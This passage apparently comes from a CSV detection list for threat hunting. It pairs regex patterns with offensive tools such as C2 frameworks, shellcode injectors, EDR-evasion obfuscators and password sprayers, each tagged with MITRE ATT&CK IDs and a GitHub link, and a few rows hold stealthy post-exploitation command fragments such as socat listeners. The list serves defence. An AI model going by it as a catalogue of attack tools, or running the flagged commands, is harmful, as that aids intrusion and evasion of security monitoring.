NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ntp-monlist.nse*",".{0,1000}\/ntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NtQuerySystemInformation.md*",".{0,1000}\/NtQuerySystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/NtRemoteLoad.exe*",".{0,1000}\/NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*/NtRemoteLoad.git*",".{0,1000}\/NtRemoteLoad\.git.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" 
"*/NtRights/*",".{0,1000}\/NtRights\/.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/NtSetSystemInformation.md*",".{0,1000}\/NtSetSystemInformation\.md.{0,1000}","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1781","248","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/Nuages_Cli*",".{0,1000}\/Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*/nuagesAPI.js*",".{0,1000}\/nuagesAPI\.js.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*/nullinux.git*",".{0,1000}\/nullinux\.git.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/nullinux.py*",".{0,1000}\/nullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal 
penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/nullinux_users.txt*",".{0,1000}\/nullinux_users\.txt.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*/nxc --help*",".{0,1000}\/nxc\s\-\-help.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc.exe*",".{0,1000}\/nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc/parsers/ip.py*",".{0,1000}\/nxc\/parsers\/ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc/parsers/nmap.py*",".{0,1000}\/nxc\/parsers\/nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nxc-ubuntu-latest*",".{0,1000}\/nxc\-ubuntu\-latest.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/nysm bash*",".{0,1000}\/nysm\sbash.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm -dr socat TCP4-LISTEN*",".{0,1000}\/nysm\s\-dr\ssocat\sTCP4\-LISTEN.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm -r ssh *@*",".{0,1000}\/nysm\s\-r\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation 
tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm.bpf.c*",".{0,1000}\/nysm\.bpf\.c.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/nysm.git*",".{0,1000}\/nysm\.git.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*/o365recon.git*",".{0,1000}\/o365recon\.git.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*/oab-parse/mspack.*.dll*",".{0,1000}\/oab\-parse\/mspack\..{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/obfs3/obfs3.py*",".{0,1000}\/obfs3\/obfs3\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/obfuscated_scripts/*",".{0,1000}\/obfuscated_scripts\/.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/Obfuscated-Code.py*",".{0,1000}\/Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*/obfuscation.exe --help*",".{0,1000}\/obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/Obfuscator.py*",".{0,1000}\/Obfuscator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/obfuscator/obfuscator.*",".{0,1000}\/obfuscator\/obfuscator\..{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*/octopus.asm*",".{0,1000}\/octopus\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/Octopus.git*",".{0,1000}\/Octopus\.git.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/octopusx64.asm*",".{0,1000}\/octopusx64\.asm.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*/OffensiveCpp.git*",".{0,1000}\/OffensiveCpp\.git.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/OffensiveCSharp.git*",".{0,1000}\/OffensiveCSharp\.git.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/OffensiveCSharp/*",".{0,1000}\/OffensiveCSharp\/.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - 
T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/OffensiveLua.git*",".{0,1000}\/OffensiveLua\.git.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/Offensive-Netsh-Helper.git*",".{0,1000}\/Offensive\-Netsh\-Helper\.git.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*/OffensiveNotion.git",".{0,1000}\/OffensiveNotion\.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/agent*",".{0,1000}\/OffensiveNotion\/agent.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/osxcross/target/bin*",".{0,1000}\/OffensiveNotion\/osxcross\/target\/bin.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the 
notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/OffensiveNotion/utils*",".{0,1000}\/OffensiveNotion\/utils.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*/office2john.py*",".{0,1000}\/office2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Office-Persistence.git*",".{0,1000}\/Office\-Persistence\.git.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*/OfficePersistence.ps1*",".{0,1000}\/OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*/Office-Persistence/master/calc.ppa*",".{0,1000}\/Office\-Persistence\/master\/calc\.ppa.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 
","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","1","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*/OG-Sadpanda/*",".{0,1000}\/OG\-Sadpanda\/.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*/Oh365UserFinder*",".{0,1000}\/Oh365UserFinder.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. 
or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*/oh365userfinder.py*",".{0,1000}\/oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/OJ/gobuster*",".{0,1000}\/OJ\/gobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","9022","1144","2024-04-29T21:27:59Z","2014-11-14T13:18:35Z" "*/omg-payloads.git*",".{0,1000}\/omg\-payloads\.git.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/omp2-brute.nse*",".{0,1000}\/omp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omp2-enum-targets.nse*",".{0,1000}\/omp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/omron-info.nse*",".{0,1000}\/omron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/On_Demand_C2/*",".{0,1000}\/On_Demand_C2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*/onedrive_user_enum*",".{0,1000}\/onedrive_user_enum.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*/oneliner.tpl*",".{0,1000}\/oneliner\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/oneliner2.tpl*",".{0,1000}\/oneliner2\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/onesixtyone/dict.txt*",".{0,1000}\/onesixtyone\/dict\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. 
onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*/onex.git*",".{0,1000}\/onex\.git.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/onionpipe.git*",".{0,1000}\/onionpipe\.git.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*/onionpipe/releases/latest*",".{0,1000}\/onionpipe\/releases\/latest.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" 